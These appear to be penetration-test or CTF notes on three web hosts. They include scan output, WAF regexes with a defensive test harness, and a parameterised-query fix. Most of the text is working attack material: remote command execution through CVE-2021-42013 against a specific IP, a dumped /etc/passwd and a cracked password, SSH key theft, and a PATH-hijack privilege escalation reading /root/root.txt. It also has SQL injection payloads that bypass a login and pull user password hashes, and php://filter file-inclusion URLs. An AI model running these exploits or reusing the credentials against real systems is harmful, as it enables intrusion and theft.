# inno
# wafy waf
http://84.252.135.107/
Shop
```
22/tcp open ssh syn-ack ttl 57 OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 4a:71:ea:d0:83:d3:ce:e4:3e:9a:9b:43:b3:07:a0:6f (RSA)
| 256 4c:13:e1:27:d4:ed:51:be:56:6e:81:f6:83:11:1e:ef (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLb7V8ujkvemFvWDJXmr98lfWXwgHhv2vSXsXxWxw9jmP1CFgq2vxc3FtpFkddP4/YBGK1sCeIgSg1aH/K6MjZs=
| 256 64:0e:b7:0e:0e:3f:a7:d1:7e:93:a1:4c:a4:36:0e:a7 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILmsmQYU6igWqIfUiqqb9WEx4XJ1TWzCRfb3hm4MBUQS
25/tcp filtered smtp no-response
80/tcp open http syn-ack ttl 57 nginx 1.21.3
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.21.3
| http-title: Wafy WAF
|_Requested resource was /login
```
## WAF executable
url: http://84.252.135.107/download/55
XSS regex:
```
.*<(([sS][cC][rR][iI][pP][tT])|([iI][mM][gG]))(.*)/?>.*
```
SQL injection regex:
```
.*(['\\\";]+)(([aA][lL][tT][eE][rR]((\\s)|(/\\*\\*/))+[tT][aA][bB][lL][eE])|([cC][rR][eE][aA][tT][eE]((\\s)|(/\\*\\*/))+[tT][aA][bB][lL][eE])|([cC][rR][eE][aA][tT][eE]((\\s)|(/\\*\\*/))+[dD][aA][tT][aA][bB][aA][sS][eE])|([dD][eE][lL][eE][tT][eE]((\\s)|(/\\*\\*/))+[tT][aA][bB][lL][eE])|([dD][rR][oO][pP]((\\s)|(/\\*\\*/))+[tT][aA][bB][lL][eE])|([dD][rR][oO][pP]((\\s)|(/\\*\\*/))+[dD][aA][tT][aA][bB][aA][sS][eE])|([iI][nN][sS][eE][rR][tT]((\\s)|(/\\*\\*/))+[iI][nN][tT][oO])|([sS][eE][lL][eE][cC][tT]((\\s)|(/\\*\\*/))+((\\*)|[\\w_-]+)((\\s)|(/\\*\\*/))+[fF][rR][oO][mM])|([uU][pP][dD][aA][tT][eE]((\\s)|(/\\*\\*/))+[tT][aA][bB][lL][eE])|([uU][nN][iI][oO][nN]((\\s)|(/\\*\\*/))+[sS][eE][lL][eE][cC][tT])).*
```
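The two rules above, wired into a small regression harness. This is an added example, not code from these notes or from the WAF binary. It assumes the binary applies each rule to a whole request value (both patterns are wrapped in `.*` on either end) and that the doubled backslashes in the extracted strings are string-literal escaping, so a normal (non-raw) Python literal reproduces the regex the binary compiles. The sample values are constructed.

```python
import re

# Rule 1 from the WAF binary (copied from the notes; no backslashes involved).
XSS_RULE = ".*<(([sS][cC][rR][iI][pP][tT])|([iI][mM][gG]))(.*)/?>.*"

# Rule 2 from the WAF binary. The notes show it with doubled backslashes, so a
# normal (non-raw) Python literal collapses "\\s" -> "\s" exactly as the
# binary's own string literal would (assumption about how it was extracted).
# The keyword separator is repeated verbatim in the pattern; it is factored
# out here only to keep the source readable, the resulting regex is identical.
_SEP = "((\\s)|(/\\*\\*/))+"  # one or more whitespace chars or empty /**/ comments
SQLI_RULE = (
    ".*(['\\\";]+)("
    "([aA][lL][tT][eE][rR]" + _SEP + "[tT][aA][bB][lL][eE])|"
    "([cC][rR][eE][aA][tT][eE]" + _SEP + "[tT][aA][bB][lL][eE])|"
    "([cC][rR][eE][aA][tT][eE]" + _SEP + "[dD][aA][tT][aA][bB][aA][sS][eE])|"
    "([dD][eE][lL][eE][tT][eE]" + _SEP + "[tT][aA][bB][lL][eE])|"
    "([dD][rR][oO][pP]" + _SEP + "[tT][aA][bB][lL][eE])|"
    "([dD][rR][oO][pP]" + _SEP + "[dD][aA][tT][aA][bB][aA][sS][eE])|"
    "([iI][nN][sS][eE][rR][tT]" + _SEP + "[iI][nN][tT][oO])|"
    "([sS][eE][lL][eE][cC][tT]" + _SEP + "((\\*)|[\\w_-]+)" + _SEP + "[fF][rR][oO][mM])|"
    "([uU][pP][dD][aA][tT][eE]" + _SEP + "[tT][aA][bB][lL][eE])|"
    "([uU][nN][iI][oO][nN]" + _SEP + "[sS][eE][lL][eE][cC][tT])"
    ").*"
)

RULES = (("xss", XSS_RULE), ("sqli", SQLI_RULE))


def verdict(value: str) -> str:
    """Return 'blocked:<rule>' for the first rule that fires, else 'allowed'.

    fullmatch is used because both rules start and end with .* ; for
    single-line values re.search would give the same answer.
    """
    for name, rule in RULES:
        if re.fullmatch(rule, value):
            return "blocked:" + name
    return "allowed"


# Constructed regression set: benign shop input that must pass, and textbook
# payloads the two rules are meant to stop.
EXPECTED = {
    "hello world": "allowed",
    "<b>bold</b>": "allowed",
    "price < 100 and stock > 0": "allowed",
    "O'Reilly": "allowed",
    "<script>alert(1)</script>": "blocked:xss",
    "<IMG SRC=x>": "blocked:xss",
    "'union select 1 from users": "blocked:sqli",
    "'DROP TABLE users--": "blocked:sqli",
    '"insert/**/into users': "blocked:sqli",
}


def audit(samples=EXPECTED) -> dict:
    """Map every sample whose verdict differs from the expectation to
    (expected, actual). An empty dict means the rule set behaves as documented."""
    return {v: (want, verdict(v)) for v, want in samples.items() if verdict(v) != want}


if __name__ == "__main__":
    for v in EXPECTED:
        print(f"{verdict(v):13} {v!r}")
    print("mismatches:", audit())
```

Running the harness after every rule change is the cheap way to catch a regex edit that silently stops matching a payload it used to block, which is the usual failure mode of hand-written WAF rules.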
# simple band
http://130.193.35.203/
```
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 9c:c7:ff:c4:06:58:96:5e:ff:ca:49:b3:b8:65:4e:57 (RSA)
| 256 8f:9d:ab:33:11:ec:b4:29:52:d4:32:75:8c:d5:71:c3 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEIVlHtUnwzPI+Ru1PlnnWZJqc+MRDuDa9kbIVnSWbrYudKu0wQ/bV8/BYxgMZKAyE9w0R243rjnn7z0ttlpGfU=
| 256 80:1a:98:f4:55:94:e9:0f:2b:b0:14:13:db:26:5f:2e (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDsf7re6oC3xRDSR/hED/lwfo6U+kE00/+n2IkvzrY8J
25/tcp filtered smtp no-response
80/tcp open http syn-ack Apache httpd 2.4.50 ((Unix))
|_http-title: Simple Band
| http-methods:
| Supported Methods: GET POST OPTIONS HEAD TRACE
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.50 (Unix)
2222/tcp open ssh syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 47:2f:63:46:23:6f:61:a5:41:7b:40:95:e7:48:eb:ca (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC+moNECS8pz9RyK18FS18twouR3EG0wvCthqdRMVRvfuCQA8rZWaA6j0K779mxdkzxTfHkZUaF9XACGUOdhPRE1uBoLwB46dmbVokMvArkODmyRaCoG3XVowAZOg6KIlYf4XM+2xicbtUx90mBsSRiZu3fkOXw/JkY/EWq/kekuN562PdERVKltT6p+qquh940KGHdfnjByrrkCmzZI2FO3J8f7kv5H9RCMA5uL+WU1N/PHq4DNZxGRHSdnqTuBQ8DJq8AZvnIuwxKQBGGHoea1UnFH3f1q+DS3HxK3kbP5VCPm/jRwz2BQPjuUTyFDvhzf1xUEiOYVWENP47bMP2j
| 256 05:87:f5:65:a4:b5:6d:d0:4b:3f:70:0a:78:5e:36:8d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBE88xTYaNpE1tFGoarc+AQLTqb4b4lQZ4H2yFIQAO45U1cOA+y4YMb8IcczPFZY3nYWJXCBYX9B1e7OxIyGxUQg=
| 256 0a:d0:46:ff:a3:be:56:9c:d5:ec:59:42:25:e1:6c:a2 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKB/yrP/d4DMrb+D3HgyRJGpn4cMiK3IR1m1ZCNECtE2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
```
/.htpasswd (Status: 403) [Size: 199]
/.hta (Status: 403) [Size: 199]
/.htaccess (Status: 403) [Size: 199]
/cgi-bin/ (Status: 403) [Size: 199]
/dev (Status: 401) [Size: 381]
/index.html (Status: 200) [Size: 11577]
```
http://130.193.35.203/dev - requires authentication (401)
CVE-2021-42013
PoC: CVE-2021-42013 reverse shell Apache 2.4.50 with CGI (the `50446.sh` script used below). Contents of `/etc/passwd` on the target:
```
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:105::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
unclejoe:x:1000:1000::/home/unclejoe:/bin/sh
```
```
cat /usr/local/apache2/conf/.htpasswd
unclejoe:$apr1$2iMRKD/X$JwtAnrb3xDIh/2gEwnxUy/
```
unclejoe:prettyprincess
```
bash 50446.sh http://130.193.35.203/ 'echo prettyprincess | su - unclejoe -c "whoami"'
bash 50446.sh http://130.193.35.203/ 'echo prettyprincess | su - unclejoe -c "echo '' | ssh-keygen" 2>&1'
bash 50446.sh http://130.193.35.203/ 'echo prettyprincess | su - unclejoe -c "cat ~/.ssh/id_rsa"'
```
## Privesc
```
bash 50446.sh http://130.193.35.203/ 'echo prettyprincess | su - unclejoe -c "cat /usr/bin/info | base64" 2>&1'
bash 50446.sh http://130.193.35.203/ 'echo prettyprincess | su - unclejoe -c "echo IyEvYmluL2Jhc2gKCmJhc2U2NCAvcm9vdC9yb290LnR4dAo= | base64 -d > /tmp/cat" 2>&1'
bash 50446.sh http://130.193.35.203/ 'echo prettyprincess | su - unclejoe -c "PATH=/tmp/:$PATH /usr/bin/info" 2>&1'
bash 50446.sh http://130.193.35.203/ 'echo prettyprincess | su - unclejoe -c "chmod +x /tmp/cat" 2>&1'
```
# Issue Tracker
http://130.193.46.68/
## nmap
```
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
53/tcp closed domain conn-refused
9000/tcp open http syn-ack nginx 1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
## SQL injection
login: admin' or 1=1-- -
pass: 123123
## User info
http://130.193.46.68:9000/manage_user.php?id=2
http://130.193.46.68:9000/manage_user.php?id=2%27%20or%201=1--%20-
Union-based injection:
http://130.193.46.68:9000/manage_user.php?id=22%27%20union%20select%201,sqlite_version(),3,4,5,6,7,8,9,10,11--%20-
DB: SQLite 3.31.1
http://130.193.46.68:9000/manage_user.php?id=22%27%20union%20select%201,tbl_name,3,4,5,6,7,8,9,10,11%20FROM%20sqlite_master%20WHERE%20type=%27table%27%20and%20tbl_name%20NOT%20like%20%27sqlite_%25%27--%20-
tables: department_list,user_list,issue_list,comment_list
`user_list` schema (from `sqlite_master`):
```
CREATE TABLE user_list ( `user_id` INTEGER PRIMARY KEY AUTOINCREMENT, `fullname` TEXT NOT NULL, `email` TEXT NOT NULL, `contact` TEXT NOT NULL, `username` TEXT NOT NULL, `password` TEXT NOT NULL, `department_id` INTEGER, `type` INTEGER, `designation` TEXT NOT NULL, `date_created` TIMESTAMP DEFAULT CURRENT_TIMESTAMP )
```
username|password (as stored)
--|--
admin|39b46c5fd3bf8e3fd1fdef4c11865f76
jsmith|77732c5dfb225a78a70986225f00446d
cblake|cd74fae0a3adf459f73bbf187607ccea
rdennyel|ab137b505694d419458bdc80f62496cf
cblake - cblake
rdennyel - rdennyel
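The `manage_user.php?id=` lookup rebuilt in Python's `sqlite3`, as an added example that is not the tracker's own code. It loads the recovered `user_list` schema into an in-memory database with constructed rows, and puts the string-spliced query that the notes exploit next to the parameterised form that fixes it; the `payload` value is the `id` from the notes.

```python
import sqlite3

# Schema exactly as recovered from sqlite_master in the notes; the rows below
# are constructed (placeholder password values, made-up names and contacts).
SCHEMA = (
    "CREATE TABLE user_list ( `user_id` INTEGER PRIMARY KEY AUTOINCREMENT, "
    "`fullname` TEXT NOT NULL, `email` TEXT NOT NULL, `contact` TEXT NOT NULL, "
    "`username` TEXT NOT NULL, `password` TEXT NOT NULL, `department_id` INTEGER, "
    "`type` INTEGER, `designation` TEXT NOT NULL, "
    "`date_created` TIMESTAMP DEFAULT CURRENT_TIMESTAMP )"
)
USERS = [  # (fullname, email, contact, username, password, department_id, type, designation)
    ("Administrator", "admin@example.test", "000", "admin", "<hash placeholder>", None, 1, "Admin"),
    ("J. Smith", "jsmith@example.test", "111", "jsmith", "<hash placeholder>", 1, 2, "Staff"),
    ("C. Blake", "cblake@example.test", "222", "cblake", "<hash placeholder>", 1, 2, "Staff"),
    ("R. Dennyel", "rdennyel@example.test", "333", "rdennyel", "<hash placeholder>", 2, 2, "Staff"),
]


def make_db() -> sqlite3.Connection:
    """Build the in-memory table; user_id is assigned 1..4 in list order."""
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    conn.executemany(
        "INSERT INTO user_list (fullname, email, contact, username, password, "
        "department_id, type, designation) VALUES (?, ?, ?, ?, ?, ?, ?, ?)",
        USERS,
    )
    return conn


def lookup_user_concat(conn: sqlite3.Connection, user_id: str) -> list:
    """The pattern behind manage_user.php?id=...: the query-string value is
    spliced into the SQL text, so the value can rewrite the WHERE clause."""
    sql = f"SELECT user_id, username FROM user_list WHERE user_id = '{user_id}'"
    return conn.execute(sql).fetchall()


def lookup_user_param(conn: sqlite3.Connection, user_id: str) -> list:
    """Hardened form: the value is bound as a parameter and is only ever data.
    SQLite applies the column's INTEGER affinity to the comparison, so "2"
    still finds user 2 while an injection string simply matches nothing."""
    sql = "SELECT user_id, username FROM user_list WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    payload = "2' or 1=1-- -"  # the id value from the notes
    print("concat:", lookup_user_concat(conn, payload))  # every row comes back
    print("param :", lookup_user_param(conn, payload))   # []
    print("param :", lookup_user_param(conn, "2"))       # [(2, 'jsmith')]
```

The same parameter binding applies to the `page`/`id` handling elsewhere in the application; whether the login form is vulnerable (as the `admin' or 1=1-- -` entry above shows it is) depends entirely on whether its query is built the first way or the second.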
## Possible LFI
http://130.193.46.68:9000/?page=users.php%00
http://130.193.46.68:9000/?page=users
## urls
url|note
--|--
http://130.193.46.68:9000/login.php|login
http://130.193.46.68:9000/db|probably DB, Forbidden
http://130.193.46.68:9000/Actions.php?a=\<action\>|actions, for example login
http://130.193.46.68:9000/home.php|
http://130.193.46.68:9000/users.php|
http://130.193.46.68:9000/depratment.php|
http://130.193.46.68:9000/tickets.php|
http://130.193.46.68:9000/issues.php|
http://130.193.46.68:9000/index.php|
http://130.193.46.68:9000/db/issue_tracker_db.db|
## logins
login|password|url
--|--|--
rdennyel|9a16a1ccef71ff4af0dbe179f1af09db|http://130.193.46.68:9000/?page=view_issue&id=8f14e45fceea167a5a36dedd4bea2543
## php://filter
http://130.193.46.68:9000/?page=php://filter/convert.base64-encode/resource=index
http://130.193.46.68:9000/?page=php://filter/convert.base64-encode/resource=/var/www/html/index